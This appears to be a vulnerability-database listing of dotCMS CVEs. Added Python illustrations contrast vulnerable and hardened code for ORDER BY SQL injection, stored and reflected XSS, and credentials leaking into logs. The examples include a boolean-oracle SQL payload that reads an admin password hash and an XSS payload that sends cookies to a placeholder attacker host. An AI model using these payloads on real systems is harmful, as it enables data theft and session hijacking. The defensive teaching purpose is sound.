519 matches found
Source: RedhatCVE, added 2025/05/22 3:54 p.m.

CVE-2020-18875

Incorrect access control in DotCMS versions before 5.1 allows remote attackers to gain privileges by injecting client configurations via VTL (Velocity) files...

CVSS 8.8 | AI score 7.3 | EPSS 0.01983 | Exploits: 0
Source: RedhatCVE, added 2025/05/22 3:30 p.m.

CVE-2020-35274

The Add Template function of the DotCMS 20.11 admin panel is affected by cross-site scripting (XSS) that can be used to gain remote privileges. An attacker could compromise the security of a website or web application through a stored XSS attack and steal cookies using XSS...

CVSS 4.8 | AI score 5.6 | EPSS 0.00612 | Exploits: 1
Source: RedhatCVE, added 2025/05/22 3:28 p.m.

CVE-2020-27848

dotCMS before 20.10.1 allows SQL injection, as demonstrated by the /api/v1/containers orderby parameter. The PaginatorOrdered classes that are used to paginate the results of REST endpoints do not sanitize the orderBy parameter, and in some cases it is vulnerable to SQL injection attacks. A user mus...

CVSS 8.8 | AI score 7.6 | EPSS 0.01223 | Exploits: 1
Source: RedhatCVE, added 2025/05/22 8:03 a.m.

CVE-2019-12872

dotCMS before 5.1.6 is vulnerable to a SQL injection that can be exploited by an attacker with the Publisher role via viewunpushedbundles.jsp...

CVSS 7.2 | AI score 7.8 | EPSS 0.01276 | Exploits: 0 | References: 1
Source: RedhatCVE, added 2025/05/22 7:57 a.m.

CVE-2018-16980

dotCMS V5.0.1 has XSS in the /html/portlet/ext/contentlet/imagetools/index.jsp fieldName and inode parameters...

CVSS 6.1 | AI score 6.1 | EPSS 0.00843 | Exploits: 1 | References: 1
Source: RedhatCVE, added 2025/05/22 6:29 a.m.

CVE-2016-4040

SQL injection vulnerability in the Workflow Screen in dotCMS before 3.3.2 allows remote administrators to execute arbitrary SQL commands via the orderby parameter...

CVSS 7.2 | AI score 8.6 | EPSS 0.01327 | Exploits: 2 | References: 1
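Worked illustration of the ORDER BY injection pattern behind CVE-2020-27848 and CVE-2016-4040, added here as an example and not taken from dotCMS's code base: a paginator that concatenates the caller's orderBy string into the SQL text, the boolean-based probe that turns the resulting row order into an oracle, and the allowlist mapping that closes the hole. The table names, columns and the sqlite3 sample rows are constructed for the example; the real PaginatorOrdered classes, schema and query are not shown on this page.

```python
import sqlite3


def make_db():
    # Constructed sample schema and rows (not dotCMS's): a few containers plus a
    # users table holding a secret the attacker wants to read one chunk at a time.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE container (inode TEXT, title TEXT, mod_date TEXT);
        INSERT INTO container VALUES ('c1', 'zebra', '2020-01-01'),
                                     ('c2', 'apple', '2020-02-01'),
                                     ('c3', 'mango', '2020-03-01');
        CREATE TABLE users (name TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'sha256:ab12cd34');
    """)
    return db


def list_containers_vulnerable(db, order_by):
    # The flaw: the orderBy request parameter is pasted straight into the SQL text.
    # Bind parameters cannot help here, because ORDER BY takes an identifier or
    # expression rather than a value, so the only fix is to constrain what goes in.
    sql = "SELECT inode, title FROM container ORDER BY " + order_by
    return [row[0] for row in db.execute(sql)]


def oracle_payload(guess):
    # Boolean-based probe: sort by title when the admin hash starts with `guess`,
    # otherwise by inode. The order of the returned rows leaks one bit per request,
    # so the secret can be recovered without an error message or a stacked query.
    return (f"(CASE WHEN (SELECT substr(password_hash, 1, {len(guess)}) "
            f"FROM users WHERE name = 'admin') = '{guess}' THEN title ELSE inode END)")


# Hardened version: the API field name is looked up in a fixed map and the
# direction is compared against two literals. Anything else is rejected.
ALLOWED_COLUMNS = {"inode": "inode", "title": "title", "modDate": "mod_date"}


class BadOrderBy(ValueError):
    pass


def list_containers_hardened(db, order_by):
    parts = order_by.strip().split()
    if not 1 <= len(parts) <= 2:
        raise BadOrderBy(order_by)
    column = ALLOWED_COLUMNS.get(parts[0])
    direction = parts[1].lower() if len(parts) == 2 else "asc"
    if column is None or direction not in ("asc", "desc"):
        raise BadOrderBy(order_by)
    # Only server-side constants reach the SQL string from here on.
    sql = f"SELECT inode, title FROM container ORDER BY {column} {direction}"
    return [row[0] for row in db.execute(sql)]


def demo():
    db = make_db()
    hit = list_containers_vulnerable(db, oracle_payload("sha256"))   # rows sorted by title
    miss = list_containers_vulnerable(db, oracle_payload("md5"))     # rows sorted by inode
    try:
        list_containers_hardened(db, oracle_payload("sha256"))
        rejected = False
    except BadOrderBy:
        rejected = True
    return hit, miss, rejected, list_containers_hardened(db, "title desc")


if __name__ == "__main__":
    print(demo())
```

The two vulnerable calls return the rows in different orders purely because of the subquery result, which is what makes an unsanitized ORDER BY exploitable even when the endpoint never prints an error and the driver refuses multiple statements. The hardened variant never lets request text into the SQL string: it translates the field name through a map and accepts only `asc`/`desc`.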
Source: RedhatCVE, added 2025/05/22 5:43 a.m.

CVE-2017-15219

The dotCMS 4.1.1 application is vulnerable to stored cross-site scripting (XSS) affecting the Vanity URLs Title field, the Containers Description field, and the Templates Description field...

CVSS 5.4 | AI score 4.9 | EPSS 0.00513 | Exploits: 1 | References: 1
Source: Positive Technologies, added 2024/07/26 12:00 a.m.

PT-2024-31161

Name of the vulnerable software and affected versions:
Software versions prior to 24.07.12
Software versions 23.01.20 LTS through 23.01.19 LTS
Software versions 23.10.24v13 LTS and earlier
Software versions 24.04.24v5 LTS and earlier

Description: The issue arises in the System → Maintenance tool,...

CVSS 9.9 | AI score 5.9 | EPSS 0.00477 | Exploits: 0 | References: 6
Source: CNNVD, added 2024/07/26 12:00 a.m.

DotCMS security vulnerability

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in DotCMS. An attacker exploiting the vulnerability could impersonate other users via the session ID...

CVSS 4.9 | AI score 6.7 | EPSS 0.00477 | Exploits: 0 | References: 2
Source: CNNVD, added 2024/07/25 12:00 a.m.

DotCMS security vulnerability

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in DotCMS that originates from a URL parameter on the login page used for resetting a password, which can be used to inject HTML code...

CVSS 6.1 | AI score 6.7 | EPSS 0.00239 | Exploits: 0 | References: 2
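The stored and reflected injection entries above (CVE-2020-35274, CVE-2018-16980, CVE-2017-15219 and the login-page HTML injection) share one root cause: a field value or URL parameter is written into a page without being encoded for the HTML context it lands in. The Python example below is added here to show that and is not dotCMS code (dotCMS renders through JSP and Velocity, which this page does not show); the payload strings, the row template, the `tag_count` helper and the `safe_href` helper are all constructed for the illustration.

```python
import html
import re
from urllib.parse import urlparse

# Constructed payloads of the kind that would be saved in a Title/Description
# field or carried in a login-page URL parameter (not taken from any advisory).
STORED_TITLE = "Home<script>document.location='//evil.example/?c='+document.cookie</script>"
STORED_DESCRIPTION = '" onmouseover="alert(1)'
RESET_PARAM = "<img src=x onerror=alert(document.domain)>"

_TAG = re.compile(r"</?[a-zA-Z]")


def tag_count(fragment):
    # Counts real tag openers in a fragment; an encoded '&lt;script' does not count,
    # so the difference between vulnerable and hardened output is measurable.
    return len(_TAG.findall(fragment))


def render_template_row_vulnerable(title, description):
    # Raw interpolation: the stored description breaks out of the title attribute
    # and the stored title becomes live markup in every admin's browser.
    return f'<tr><td title="{description}">{title}</td></tr>'


def render_template_row_hardened(title, description):
    # Encode for the context each value lands in: a quoted attribute and element text.
    return (f'<tr><td title="{html.escape(description, quote=True)}">'
            f'{html.escape(title, quote=True)}</td></tr>')


def render_reset_notice_vulnerable(param):
    # Reflected variant: the URL parameter is echoed into the login page as-is.
    return f"<p>Password reset requested for {param}</p>"


def render_reset_notice_hardened(param):
    return f"<p>Password reset requested for {html.escape(param, quote=True)}</p>"


def safe_href(url, fallback="/"):
    # URL attribute context: encoding alone is not enough, because 'javascript:'
    # survives html.escape untouched, so the scheme is allowlisted before encoding.
    if urlparse(url).scheme not in ("", "http", "https"):
        return fallback
    return html.escape(url, quote=True)


if __name__ == "__main__":
    cases = [
        ("template row",
         render_template_row_vulnerable(STORED_TITLE, STORED_DESCRIPTION),
         render_template_row_hardened(STORED_TITLE, STORED_DESCRIPTION)),
        ("reset notice",
         render_reset_notice_vulnerable(RESET_PARAM),
         render_reset_notice_hardened(RESET_PARAM)),
    ]
    for name, vuln, fixed in cases:
        print(f"{name}: {tag_count(vuln)} tags unencoded, {tag_count(fixed)} tags encoded")
```

The attribute payload is the one to watch: a title that only escapes `<` and `>` would still let `" onmouseover="` close the attribute, which is why `quote=True` is used for every attribute context, and why `href`/`src` values need a scheme check on top of the encoding.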
Source: NVD, added 2024/04/01 10:15 p.m.

CVE-2024-3164

In the dotCMS dashboard, the Tools and Log Files tabs under the System → Maintenance portlet, which is and always has been an Admin portlet, are accessible to anyone with that portlet and not just to CMS Admins. Users who get site admin but not system admin should not have access to the System...

CVSS 4.5 | AI score 4.7 | EPSS 0.00469 | Exploits: 0 | References: 3
Source: OSV, added 2024/04/01 10:15 p.m.

CVE-2024-3164

In the dotCMS dashboard, the Tools and Log Files tabs under the System → Maintenance portlet, which is and always has been an Admin portlet, are accessible to anyone with that portlet and not just to CMS Admins. Users who get site admin but not system admin should not have access to the System...

CVSS 4.5 | AI score 7.1 | Exploits: 0 | References: 3
Source: Cvelist, added 2024/04/01 9:38 p.m.

CVE-2024-3165 Database Credential Exposure in the Logs

The System → Maintenance → Log Files view in the dotCMS dashboard includes the username/password for database connections in the log output. Nevertheless, this is a moderate issue, as it requires a backend admin and the databases are locked down by environment. OWASP Top 10 - A05 Insecure Design OWASP Top...

CVSS 4.5 | AI score 5.1 | EPSS 0.00495 | Exploits: 0 | References: 3
Source: Vulnrichment, added 2024/04/01 9:38 p.m.

CVE-2024-3165 Database Credential Exposure in the Logs

The System → Maintenance → Log Files view in the dotCMS dashboard includes the username/password for database connections in the log output. Nevertheless, this is a moderate issue, as it requires a backend admin and the databases are locked down by environment. OWASP Top 10 - A05 Insecure Design OWASP Top...

CVSS 4.5 | AI score 6.9 | EPSS 0.00495 | Exploits: 0 | References: 3
Source: CVE, added 2024/04/01 9:38 p.m.

CVE-2024-3165

CVE-2024-3165 affects dotCMS, where the System → Maintenance → Log Files output reveals database credentials (username/password) in logs. This is described as a moderate issue requiring backend admin access and environment-led DB lockdown. Connected documents confirm the vulnerability stems f...

CVSS 4.5 | AI score 4.7 | EPSS 0.00495 | Exploits: 0 | References: 3 | Affected Software: 1
Source: Cvelist, added 2024/04/01 9:27 p.m.

CVE-2024-3164

In the dotCMS dashboard, the Tools and Log Files tabs under the System → Maintenance portlet, which is and always has been an Admin portlet, are accessible to anyone with that portlet and not just to CMS Admins. Users who get site admin but not system admin should not have access to the System...

CVSS 4.5 | AI score 5.1 | EPSS 0.00469 | Exploits: 0 | References: 3
Source: Vulnrichment, added 2024/04/01 9:27 p.m.

CVE-2024-3164

In the dotCMS dashboard, the Tools and Log Files tabs under the System → Maintenance portlet, which is and always has been an Admin portlet, are accessible to anyone with that portlet and not just to CMS Admins. Users who get site admin but not system admin should not have access to the System...

CVSS 4.5 | AI score 4.7 | EPSS 0.00469 | Exploits: 0 | References: 3
Source: CVE, added 2024/04/01 9:27 p.m.

CVE-2024-3164

The CVE-2024-3164 issue affects dotCMS, where the Tools and Log Files tabs under the System → Maintenance portlet are accessible to any user with the portlet, not just CMS Admins. The vulnerability arises from broken access control, allowing site-admin users (without system-admin privileges) to access...

CVSS 4.5 | AI score 4.7 | EPSS 0.00469 | Exploits: 0 | References: 3 | Affected Software: 1
Source: CNNVD, added 2024/04/01 12:00 a.m.

DotCMS security vulnerability

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in DotCMS that originates in log files that expose the usernames and passwords of database connections...

CVSS 4.5 | AI score 6.8 | EPSS 0.00495 | Exploits: 0 | References: 4
Source: CNNVD, added 2024/04/01 12:00 a.m.

dotCMS security vulnerability

DotCMS is an open source content management system written in Java by DotCMS, Inc. for managing content and content-driven sites and applications. A security vulnerability exists in dotCMS that stems from the fact that any user with portlet privileges can access the Tools and Log Files tabs under...

CVSS 4.5 | AI score 6.7 | EPSS 0.00469 | Exploits: 0 | References: 4
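CVE-2024-3164 and CVE-2024-3165 above chain together: a site admin who had been granted the Maintenance portlet could open the Log Files tab, and the log output shown there carried the database username and password. The Python example below is added here to show the two controls a practitioner would put in place and is not dotCMS code; the log lines, the regexes, the `User` model and the function names are constructed for the illustration. It redacts credentials at the logging layer so the secret never reaches a file, and separately gates the log-serving path on the system-admin flag rather than on portlet membership, redacting again on the way out as defence in depth.

```python
import io
import logging
import re
from dataclasses import dataclass

# Constructed log lines of the shape that datasource initialisation commonly emits.
SAMPLE_LOG = [
    "INFO  DataSourceConfig - Connecting to jdbc:postgresql://db.internal:5432/dotcms?user=dotcms&password=Sup3rS3cret&ssl=true",
    "INFO  DataSourceConfig - DB_PASSWORD=Sup3rS3cret loaded from environment",
    'DEBUG DataSourceConfig - datasource {"username": "dotcms", "password": "Sup3rS3cret"}',
    "INFO  DataSourceConfig - Fallback URL postgres://dotcms:Sup3rS3cret@db.internal/dotcms",
    "INFO  IndexTask - Reindexed 120 contentlets",
]

# key=value and "key": "value" forms, plus the user:pass@ part of a connection URL.
_KV_SECRET = re.compile(r'(?i)(password|passwd|pwd|secret|token)("?\s*[=:]\s*"?)([^\s"&,;]+)')
_URL_USERINFO = re.compile(r"(://[^:/@\s]+:)([^@\s]+)(@)")


def redact(text):
    text = _KV_SECRET.sub(r"\1\2[REDACTED]", text)
    return _URL_USERINFO.sub(r"\1[REDACTED]\3", text)


class RedactingFilter(logging.Filter):
    # Rewrites the fully formatted message, so no handler (file, console, or a
    # dashboard tab that reads the file later) ever sees the secret.
    def filter(self, record):
        record.msg = redact(record.getMessage())
        record.args = ()
        return True


def emit_through_filter(messages):
    # Routes the sample lines through a logger carrying the filter and returns
    # exactly what a file handler would have written.
    buf = io.StringIO()
    logger = logging.getLogger("example.datasource")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.addFilter(RedactingFilter())
    logger.addHandler(handler)
    for message in messages:
        logger.info(message)
    return buf.getvalue().splitlines()


@dataclass(frozen=True)
class User:
    name: str
    portlets: frozenset
    system_admin: bool = False


class Forbidden(PermissionError):
    pass


def serve_log_files(user, raw_lines):
    # Holding the Maintenance portlet is necessary but not sufficient for the
    # Log Files tab: the system-admin flag is checked explicitly, deny by default.
    if "maintenance" not in user.portlets:
        raise Forbidden(f"{user.name}: Maintenance portlet not granted")
    if not user.system_admin:
        raise Forbidden(f"{user.name}: Log Files requires a system admin")
    # Second line of defence: redact again in case an unfiltered logger wrote the file.
    return [redact(line) for line in raw_lines]


def demo():
    site_admin = User("site-admin", frozenset({"maintenance"}))
    sys_admin = User("sys-admin", frozenset({"maintenance"}), system_admin=True)
    results = {"filtered": emit_through_filter(SAMPLE_LOG)}
    for user in (site_admin, sys_admin):
        try:
            results[user.name] = serve_log_files(user, SAMPLE_LOG)
        except Forbidden as exc:
            results[user.name] = str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The filter is attached to the handler rather than to individual loggers so that it also covers third-party library loggers (the JDBC driver or connection pool is usually the component that logs the URL). The regexes are deliberately greedy about what counts as a secret; a false positive costs a masked token in a log line, a false negative costs a database.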